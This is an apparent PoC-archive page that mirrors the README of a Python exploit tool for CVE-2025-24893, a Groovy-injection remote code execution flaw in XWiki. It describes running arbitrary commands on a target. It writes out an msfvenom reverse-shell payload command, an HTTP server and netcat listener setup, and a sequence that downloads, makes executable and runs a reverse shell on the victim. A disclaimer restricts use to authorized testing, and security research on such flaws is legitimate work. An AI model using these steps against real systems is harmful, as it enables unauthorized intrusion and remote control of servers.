关联漏洞
描述
PoC exploits CVE-2025-24893 , a remote code execution (RCE) vulnerability in XWiki caused by improper sandboxing in Groovy macros rendered asynchronously. It allows arbitrary command execution through injection into RSS-based SolrSearch endpoints.
介绍
# XWiki CVE-2025-24893 Proof of Concept
**Authors**: [Net.Doge](https://github.com/Net-Doge) & [Infinit3i](https://https://github.com/Infinit3i)
---
<div align="center">
<img src="https://github.com/Infinit3i/CVE-2025-24893/blob/253b376ff3575ce19a4fb7062916981712f79cfe/XWiki-CVE-2025-24893.png" alt="CVE-2025-24893 Picture" width="400">
</div>
<p align="center">
<br><br>
<a title="Hits" target="_blank" href="https://github.com/infinit3i/CVE-2025-24893"><img src="https://hits.b3log.org/infinit3i/CVE-2025-24893.svg"></a>
<a title="Twitter" target="_blank" href="https://x.com/infinit3i"><img alt="Twitter Follow" src="https://img.shields.io/twitter/follow/b3logos?label=Follow&style=social"></a>
</p>
---
This Python script exploits **CVE-2025-24893**, a remote code execution (RCE) vulnerability in [XWiki](https://www.xwiki.org/) caused by improper sandboxing in Groovy macros rendered asynchronously. It allows arbitrary command execution through injection into RSS-based SolrSearch endpoints.
## 📌 Features
- Single command execution via Groovy injection
- Automatic reverse shell payload generation (with `msfvenom`)
- Option to customize:
- Remote target
- Local IP address
- HTTP server port
- Reverse shell beacon port
- Clean bash payload previews
- ANSI color-coded interactive TUI
## 🚀 Usage
1. Clone or download the script.
2. Make sure you have the following installed:
- `msfvenom` from Metasploit
- Python 3
- `jq` (used in the bash payloads)
3. Run the script:
```bash
python3 CVE-2025-24893-PoC.py
```
4. Select from the menu:
* **Run Command** – Execute any shell command remotely.
* **Reverse Shell** – Generate and deploy an ELF reverse shell to the target.
* **Change Settings** – Modify LHOST, RHOST, server port, or beacon port.
## 🧪 Reverse Shell Workflow
1. Payload is generated:
```bash
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<your_ip> LPORT=<beacon_port> -f elf -o rev
```
2. You are prompted to start a Python HTTP server and netcat listener:
```bash
python3 -m http.server 8080
nc -lvnp 31337
```
3. The script sends the following sequence to the target:
* Download payload
* Make it executable
* Execute the binary
## ⚠️ Disclaimer
This tool is for **educational and authorized testing purposes only**. Unauthorized use against systems you do not own or have explicit permission to test is **illegal** and unethical.
## 📄 Reference
* [XWiki](https://www.xwiki.org/)
* [MITRE CVE-2025-24893](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-24893)
文件快照
[4.0K] /data/pocs/a988f22eb8c7c2e87e9e02b316a3f84e3b1611d8
├── [6.0K] CVE-2025-24893-PoC.py
├── [2.5K] README.md
└── [2.0M] XWiki-CVE-2025-24893.png
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。